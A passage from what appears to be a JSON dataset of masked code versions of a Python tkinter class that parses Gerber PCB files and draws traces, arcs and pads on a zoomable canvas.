start)\n value = item[start - 1:stop]\n self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n self.__get_numbers(item)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y +\n 'i', self.x + 'i', self.y + 'i', width=self.\n current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i',\n str(cp_y - radius) + 'i', str(cp_x + radius) +\n 'i', str(cp_y + radius) + 'i', outline='black',\n width=self.current_aperture)\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.\n start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) -\n cp_y, float(self.x) - cp_x))\n ext = math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i',\n str(cp_y + radius) + 'i', str(cp_x - radius) +\n 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n",
"step-2": "<mask token>\n\n\nclass GerberCanvas:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {}\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.\n my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.\n HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,\n yscrollcommand=self.y_scrollbar.set)\n self.__part_selected = 0\n <mask token>\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines(\n )\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for key, value in self.AD_commands.items():\n self.current_ad_command = key\n if item in key:\n if 'R,' in value:\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x) / 2)\n elif 'C,' in value:\n print(value)\n self.current_aperture = self.__get_circle_diameter(\n value)\n elif 'O,' in value:\n pass\n elif 'P,' in value:\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.\n units_string[GerberCanvas.units], str(y0) +\n GerberCanvas.units_string[GerberCanvas.units], str(\n x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.\n units], outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n if self.file_gto:\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x,\n ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.\n start_y + 'i', self.x + 'i', self.y + 'i', width=\n self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n if self.file_gto:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x -\n radius) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], outline='black', width=self.\n current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n break\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(\n self.start_y) - cp_y, float(self.start_x) -\n cp_x))\n end_angle = math.degrees(math.atan2(float(self.\n y) - cp_y, float(self.x) - cp_x))\n try:\n self.my_canvas.create_arc(str(cp_x + radius\n ) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], style=tk.ARC, width=self.\n current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline\n ='black')\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = value.find('X'[0:len(value)])\n width = value[2:find_x]\n length = value[find_x + 1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y),\n float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = 1 - distance ** 2 / (2 * radius ** 2)\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n i_temp = item[i_start + 1:j_start]\n j_temp = item[j_start + 1:d_start]\n j_temp = str(int(j_temp) * -1)\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n if 'X' and 'Y' in item:\n found = 0\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n x_temp = item[x_start + 1:y_start]\n y_temp = item[y_start + 1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n x_temp = item[x_start + 1:d_start]\n self.x = self.__format_number(x_temp)\n if 'Y' in item and found == 0:\n found = 1\n y_start = item.find('Y')\n d_start = item.find('D')\n y_temp = item[y_start + 1:d_start]\n y_temp = str(int(y_temp) * -1)\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number) - 5]\n if '-' in number:\n return first + '.' + last\n else:\n return first + '.' + last\n\n def high_lite_part(self, x, y, layer):\n x1 = self.__format_pnp(x)\n y1 = self.__format_pnp(y) * -1\n last_x = float(x1) + 0.1\n last_y = float(y1) + 0.1\n if layer == 'TopLayer':\n color = 'red'\n else:\n color = 'blue'\n self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', \n str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=\n color, fill=color)\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 = move1 / 10\n final = move2 / 10\n return final\n\n def __parse_file_gtp(self):\n temp_list = self.file_commands\n for item in temp_list:\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n self.__get_numbers(item)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y +\n 'i', self.x + 'i', self.y + 'i', width=self.\n current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i',\n str(cp_y - radius) + 'i', str(cp_x + radius) +\n 'i', str(cp_y + radius) + 'i', outline='black',\n width=self.current_aperture)\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.\n start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) -\n cp_y, float(self.x) - cp_x))\n ext = math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i',\n str(cp_y + radius) + 'i', str(cp_x - radius) +\n 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n",
"step-3": "<mask token>\n\n\nclass GerberCanvas:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {}\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.\n my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.\n HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,\n yscrollcommand=self.y_scrollbar.set)\n self.__part_selected = 0\n\n def load_gerber(self, path, file):\n \"\"\"load gerber file\n :param path: path to the file\n :param file: file name to use\n \"\"\"\n try:\n all_ids = self.my_canvas.find_all()\n if all_ids:\n try:\n for item in all_ids:\n print(item)\n self.my_canvas.delete(item)\n except tk.TclError:\n messagebox.showerror('Error', tk.TclError)\n if path:\n self.file_gto = True\n try:\n with open(os.path.join(path, file), 'r') as gerber_file:\n self.file_commands = gerber_file.read().splitlines()\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_commands)\n self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')\n self.gerber_file_name = file\n self.scaled = False\n if DEBUG:\n print('Scroll region is : ', self.bounding_box_size)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTO')\n finally:\n self.file_gto = False\n self.load_gerber_gtp(os.path.join(path, file))\n self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines(\n )\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for key, value in self.AD_commands.items():\n self.current_ad_command = key\n if item in key:\n if 'R,' in value:\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x) / 2)\n elif 'C,' in value:\n print(value)\n self.current_aperture = self.__get_circle_diameter(\n value)\n elif 'O,' in value:\n pass\n elif 'P,' in value:\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.\n units_string[GerberCanvas.units], str(y0) +\n GerberCanvas.units_string[GerberCanvas.units], str(\n x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.\n units], outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n if self.file_gto:\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x,\n ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.\n start_y + 'i', self.x + 'i', self.y + 'i', width=\n self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n if self.file_gto:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x -\n radius) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], outline='black', width=self.\n current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n break\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(\n self.start_y) - cp_y, float(self.start_x) -\n cp_x))\n end_angle = math.degrees(math.atan2(float(self.\n y) - cp_y, float(self.x) - cp_x))\n try:\n self.my_canvas.create_arc(str(cp_x + radius\n ) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], style=tk.ARC, width=self.\n current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline\n ='black')\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = value.find('X'[0:len(value)])\n width = value[2:find_x]\n length = value[find_x + 1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y),\n float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = 1 - distance ** 2 / (2 * radius ** 2)\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n i_temp = item[i_start + 1:j_start]\n j_temp = item[j_start + 1:d_start]\n j_temp = str(int(j_temp) * -1)\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n if 'X' and 'Y' in item:\n found = 0\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n x_temp = item[x_start + 1:y_start]\n y_temp = item[y_start + 1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n x_temp = item[x_start + 1:d_start]\n self.x = self.__format_number(x_temp)\n if 'Y' in item and found == 0:\n found = 1\n y_start = item.find('Y')\n d_start = item.find('D')\n y_temp = item[y_start + 1:d_start]\n y_temp = str(int(y_temp) * -1)\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number) - 5]\n if '-' in number:\n return first + '.' + last\n else:\n return first + '.' + last\n\n def high_lite_part(self, x, y, layer):\n x1 = self.__format_pnp(x)\n y1 = self.__format_pnp(y) * -1\n last_x = float(x1) + 0.1\n last_y = float(y1) + 0.1\n if layer == 'TopLayer':\n color = 'red'\n else:\n color = 'blue'\n self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', \n str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=\n color, fill=color)\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 = move1 / 10\n final = move2 / 10\n return final\n\n def __parse_file_gtp(self):\n temp_list = self.file_commands\n for item in temp_list:\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n self.__get_numbers(item)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y +\n 'i', self.x + 'i', self.y + 'i', width=self.\n current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i',\n str(cp_y - radius) + 'i', str(cp_x + radius) +\n 'i', str(cp_y + radius) + 'i', outline='black',\n width=self.current_aperture)\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.\n start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) -\n cp_y, float(self.x) - cp_x))\n ext = math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i',\n str(cp_y + radius) + 'i', str(cp_x - radius) +\n 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n",
